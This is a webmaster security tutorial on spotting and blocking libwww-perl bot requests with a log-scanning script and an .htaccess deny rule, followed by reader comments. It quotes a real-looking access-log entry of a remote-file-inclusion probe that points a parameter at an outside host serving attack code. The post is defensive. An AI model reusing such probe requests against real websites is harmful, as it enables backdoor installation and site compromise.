The world of hackers, crackers, bots and spammers keeps growing, and it has become a serious threat to many websites. libwww-perl (LWP) is a WWW client/server library for Perl, and hackers, spammers and bots can use it to perform attacks on your site. For example, open your web server access log and run the command below.
$ grep 'libwww-perl' access_log
Do you see something similar to the below output?
220.127.116.11 www.domain.com - [21/Aug/2013:21:22:38 +0000] "GET /webdir/yesno.phtml?no_url=http://www.hackersite.com/list1.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"
It means some hacker is trying to exploit a security hole and install backdoor pages. So the libwww-perl user agent has to be blocked to prevent such attacks on your website.
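The grep above only lists matching lines. As an added example (not code from the original post), this Python script parses lines in the format shown, keeps requests whose User-Agent starts with libwww-perl, notes any query parameter whose value is a remote URL, and reports whether the server answered 403. The function name scan, the assumed field layout, and the two extra sample lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Field layout of the log line shown above (assumed for every line):
# client vhost ident [time] "request" status bytes "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"\S+ (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<agent>[^"]*)"$'
)
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def scan(lines):
    """Return one finding per request sent with a libwww-perl User-Agent."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        # Case-insensitive prefix match, as a SetEnvIfNoCase rule would do.
        if not m or not m["agent"].lower().startswith("libwww-perl"):
            continue
        url = urlsplit(m["target"])
        # A parameter whose value is itself a URL suggests a remote-include probe.
        remote = [name for name, value in parse_qsl(url.query)
                  if REMOTE_URL_RE.match(value)]
        findings.append({
            "client": m["client"],
            "time": m["time"],
            "path": url.path,
            "remote_url_params": remote,
            "blocked": m["status"] == "403",  # server refused the request
        })
    return findings

# Constructed sample input: the first line is the one quoted on this page,
# the other two are made up for this example.
SAMPLE = [
    '220.127.116.11 www.domain.com - [21/Aug/2013:21:22:38 +0000] '
    '"GET /webdir/yesno.phtml?no_url=http://www.hackersite.com/list1.txt? '
    'HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"',
    '192.0.2.10 www.domain.com - [21/Aug/2013:21:25:02 +0000] '
    '"GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 www.domain.com - [22/Aug/2013:09:10:11 +0000] '
    '"GET / HTTP/1.1" 403 211 "-" "libwww-perl/6.05"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        state = "blocked" if f["blocked"] else "SERVED"
        print(f["time"], f["client"], f["path"], f["remote_url_params"], state)
```

Entries reported as SERVED with a non-empty remote_url_params list are the ones to review first, since the server answered them instead of refusing.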
How to verify whether the libwww-perl user agent is blocked on your server?
Step 1: Download this simple Perl script and rename it as ‘test-lwp.pl’.
Step 2: Edit the ‘test-lwp.pl’ file and replace http://your-website.com/ with your website name.
Step 3: Give executable permission to the script:
chmod +x test-lwp.pl
Step 4: Run the Perl script as below,
Step 4 should display “Error : 403 Forbidden“. If it does not, then your website might be prone to libwww-perl user agent attacks.
How to deny libwww-perl attacks using .htaccess?
Using mod_rewrite and an .htaccess file, we can block the libwww-perl user agent. Edit your .htaccess file and add the rule as follows:
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots
Now execute the test-lwp.pl file and you should see “Error : 403 Forbidden”. That’s it!
Comments
/test-lwp.pl: line 1: imple: command not found
./test-lwp.pl: line 2: use: command not found
./test-lwp.pl: line 3: =: command not found
./test-lwp.pl: line 4: syntax error near unexpected token `(‘
./test-lwp.pl: line 4: ` $ua->agent(“$0/0.1 ” . $ua->agent);
I am getting the above error while testing whether my server is protected from Perl script attacks.
Hi Anil, do you have Perl installed? What does which perl command say?
Thanks Peter, it's really required info for all the webmasters... will be looking for more such tips on security.